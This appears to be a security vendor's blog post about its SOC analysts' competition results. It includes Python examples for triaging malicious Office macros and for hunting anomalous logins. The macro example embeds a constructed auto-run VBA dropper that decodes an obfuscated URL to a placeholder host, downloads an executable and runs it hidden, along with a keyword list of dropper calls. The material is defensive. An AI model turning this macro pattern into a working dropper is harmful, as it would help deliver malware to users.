One of the great challenges of cybersecurity is the need to learn continuously. Our adversaries adapt and change all the time, and we need to remain one step ahead of them. This is especially true of the analysts in our SOC, who never stop learning. The SOC is the front line where analysts are exposed to the latest exploits and techniques developed by threat actors. That exposure, on its own, isn't enough, however. That is why our analysts are on a continuous quest to learn from their peers and from the industry.
One exciting and rewarding way for our analysts to test themselves and learn from their peers is by participating in cybersecurity competitions. These are highly competitive events where analysts get to pit themselves against peers from other organizations in events which test both their skill and their resolve to overcome adversaries in high-pressure situations. In some cases, analysts even get the chance to take on the role of the attacker, which helps them to better understand the tactics and strategies used by their adversaries.
Our SOC teams have participated in a number of cybersecurity competitions and have achieved top results against other highly skilled teams. The list below shows some of our achievements in recent years.
- 9th (1st onsite) Security Fest CTF 2018 (among 400 teams)
- 1st and 2nd Splunk Boss of the SOC Helsinki 2019 (among 14 teams)
- 2nd Splunk Boss of the SOC Nordic 2020 (among 43 teams)
- 6th Splunk Boss of the SOC v6 .conf21 2021 (among 425 teams)
- 17th Cyber Apocalypse CTF 2022 (among 7024 teams)
- 17th Hack the Box Business CTF Dirty Money 2022 (among 657 teams)
Capture the flag (CTF) competitions have become increasingly popular among cybersecurity professionals, providing a fun and engaging way to test and improve skills. To succeed in a CTF, participants need a strong understanding of a wide range of security concepts and techniques, including cryptography, web security, reverse engineering, forensics, exploit development, and programming. Each challenge is built around one or more of these areas, and participants must use their expertise and problem-solving abilities to solve it and earn points by capturing the flag.
One of our analysts, who solved a malware analysis challenge, offered some great feedback on its real-world value: “We received an email with a suspicious document attached. The document contained a malicious VBA script that attempted to download malware when the user opened it. We were able to obtain the malware and reverse engineer it to find the flag that was hidden within it.” This delivery technique, a macro-enabled document that runs on open and fetches a second-stage payload, has been observed in multiple malware families, including Emotet, IcedID, and Dridex.
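The first step in a case like the one the analyst describes is triaging the macro before the payload is ever fetched. The script below is an added example written for this post, not code from the competition or from NTT's SOC tooling. It assumes the macro source has already been pulled out of the document (oletools' olevba does that for real files) and works on a constructed VBA snippet that mimics the pattern: an auto-run procedure, a URL assembled from Chr() pieces and string concatenation, a download and a Shell call. The indicator lists and the verdict thresholds are the author's own choices for illustration.

```python
import re

# Constructed sample macro text, modelled on the dropper pattern described above.
# Illustrative only; not a real sample and the URL is a reserved example domain.
SAMPLE_VBA = r'''
Private Sub Document_Open()
    Dim u As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & ":" & "//" & "example" & ".invalid/p.exe"
    Dim x As Object
    Set x = CreateObject("MSXML2.XMLHTTP")
    x.Open "GET", u, False
    x.Send
    Shell Environ("TEMP") & "\p.exe", vbHide
End Sub
'''

# Procedure names Office runs automatically when a document is opened or closed.
AUTOEXEC = ("AutoOpen", "Document_Open", "Workbook_Open", "Auto_Open",
            "AutoExec", "AutoClose", "Document_Close")
# Calls rarely needed in a legitimate document macro but typical of droppers
# (order matters: longer names first so they are not swallowed by shorter ones).
SUSPICIOUS = ("WScript.Shell", "ShellExecute", "URLDownloadToFile", "CreateObject",
              "XMLHTTP", "Shell", "Environ", "powershell")

_CHR = re.compile(r'Chr[Ww]?\$?\(\s*(\d+)\s*\)', re.I)          # Chr(104), ChrW(104), Chr$(104)
_CONCAT = re.compile(r'"([^"\n]*)"\s*&\s*"([^"\n]*)"')          # "a" & "b"  ->  "ab"
_URL = re.compile(r"https?://[^\s\"']+", re.I)


def deobfuscate(vba):
    """Undo the two most common string tricks: Chr(n) literals and literal concatenation.

    A Chr() that decodes to '"' would need VBA's doubled-quote escaping; for
    triage output this simplification is acceptable.
    """
    text = _CHR.sub(lambda m: '"%s"' % chr(int(m.group(1))), vba)
    prev = None
    while prev != text:                      # repeat until no adjacent literals remain
        prev = text
        text = _CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), text)
    return text


def _find_all(names, text):
    """Names from `names` that occur as whole words in `text`, in order of first appearance."""
    pat = re.compile(r'\b(' + '|'.join(re.escape(n) for n in names) + r')\b', re.I)
    seen, out = set(), []
    for m in pat.finditer(text):
        key = m.group(1).lower()
        if key not in seen:
            seen.add(key)
            out.append(m.group(1))
    return out


def triage(vba):
    """Return the indicators found in one macro module and a coarse verdict."""
    decoded = deobfuscate(vba)
    autoexec = _find_all(AUTOEXEC, decoded)
    suspicious = _find_all(SUSPICIOUS, decoded)
    urls = _URL.findall(decoded)              # URLs only become visible after decoding
    if autoexec and (suspicious or urls):
        verdict = "suspicious"                # runs on open and reaches out or executes something
    elif suspicious or urls:
        verdict = "review"                    # needs a user action to trigger; still worth a look
    else:
        verdict = "benign"
    return {"autoexec": autoexec, "suspicious": suspicious, "urls": urls, "verdict": verdict}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Running it on the sample reports the Document_Open trigger, the CreateObject, XMLHTTP, Shell and Environ calls, and the reassembled URL http://example.invalid/p.exe, which is the indicator you would block at the proxy and pivot on in mail logs while the payload itself goes to the reverse engineers. A macro with only a MsgBox comes back benign.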
Another popular cybersecurity competition is Boss of the SOC (BOTS), run by Splunk. BOTS is a blue-team competition in which participants detect and investigate simulated security incidents in a SOC environment. Teams are given data from simulated network environments and must find and explain the threats hidden in it under time pressure. These threats may include malware infections, network intrusions, and other types of cyber-attack.
One of our team members who participated in BOTS describes: “BOTS puts our threat hunting skills to the test. We got to make use of different logs, statistics, geolocation, and more to hunt for everything from APT groups to kidnapped toads.” Another member added: “BOTS pushed my problem-solving skills to the limit and taught me new strategies that have been useful in my role as an analyst.”
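The "logs, statistics, geolocation" combination the analyst mentions is the everyday shape of a threat hunt: build a per-user baseline from historical authentication logs, then look for events that fall outside it. The script below is an added example written for this post, not competition material or NTT tooling. It runs two such hunts over a constructed set of SSO/VPN login events: a login from a country never seen for that user before a cutoff date, and "impossible travel" (two successful logins from different countries closer together than a person could move). The country column stands in for the GeoIP lookup that would normally be done on the source IP; the sample rows, the cutoff and the one-hour window are the author's assumptions.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of SSO/VPN login events (not real data). The country column
# plays the role of a GeoIP lookup on src_ip, which in Splunk would be the
# iplocation command. alice's BR login on 2024-03-03 is the planted anomaly.
SAMPLE_LOGS = """\
time,user,src_ip,country,result
2024-03-01T08:01:00Z,alice,203.0.113.10,FI,success
2024-03-01T08:05:00Z,bob,198.51.100.7,SE,success
2024-03-02T07:58:00Z,alice,203.0.113.10,FI,success
2024-03-02T09:12:00Z,bob,198.51.100.7,SE,success
2024-03-03T08:03:00Z,alice,203.0.113.10,FI,success
2024-03-03T08:20:00Z,alice,192.0.2.44,BR,success
2024-03-03T21:40:00Z,bob,198.51.100.7,SE,failure
"""


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def parse_events(text):
    """Parse the CSV log into dicts with a real datetime, sorted by time."""
    events = list(csv.DictReader(io.StringIO(text)))
    for e in events:
        e["time"] = _ts(e["time"])
    return sorted(events, key=lambda e: e["time"])


def new_country_logins(events, cutoff="2024-03-03T00:00:00Z"):
    """Successful logins at or after `cutoff` from a country never seen for that
    user before the cutoff. Events before the cutoff form the per-user baseline;
    a user with no history is flagged on every country (first-seen user)."""
    cut = _ts(cutoff)
    baseline = defaultdict(set)
    for e in events:
        if e["time"] < cut and e["result"] == "success":
            baseline[e["user"]].add(e["country"])
    return [(e["user"], e["country"], e["src_ip"])
            for e in events
            if e["time"] >= cut and e["result"] == "success"
            and e["country"] not in baseline[e["user"]]]


def impossible_travel(events, window=timedelta(hours=1)):
    """Two successful logins by the same user from different countries closer
    together than `window`. Returns (user, country_from, country_to, minutes)."""
    last, hits = {}, []
    for e in events:                          # events are time-ordered
        if e["result"] != "success":
            continue
        prev = last.get(e["user"])
        if prev and prev["country"] != e["country"] and e["time"] - prev["time"] < window:
            minutes = int((e["time"] - prev["time"]).total_seconds() // 60)
            hits.append((e["user"], prev["country"], e["country"], minutes))
        last[e["user"]] = e
    return hits


if __name__ == "__main__":
    ev = parse_events(SAMPLE_LOGS)
    print("new country for user:", new_country_logins(ev))
    print("impossible travel:", impossible_travel(ev))
```

Both hunts flag the same event from different angles: alice has only ever logged in from FI, and the BR login arrives 17 minutes after an FI login. Failed logins are deliberately excluded from both, since a failure from a new country is a different (credential-stuffing) hunt. In Splunk the same logic is a `stats values(country) by user` baseline and an `iplocation` plus `streamstats` window over the time-sorted events.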
Overall, CTF and BOTS competitions provide a unique and exciting opportunity for security professionals to test and improve their skills. These competitions are challenging and engaging and can help participants to stay sharp and up-to-date on the latest security technologies and techniques. Whether you are a seasoned veteran or a newcomer to the field of security, participating in a CTF or BOTS competition can be a rewarding and valuable experience.
Cybersecurity competitions provide a competitive proving ground where our analysts can hone their skills. The experience they build from the perspective of both the defender and the attacker provides them with an invaluable edge. NTT’s Samurai Managed Detection and Response service relies on the continuous learning that our analysts undertake so that we can keep ahead of threat actors as we defend our clients.
To find out more about Samurai Managed Detection and Response, reach out to our experts today.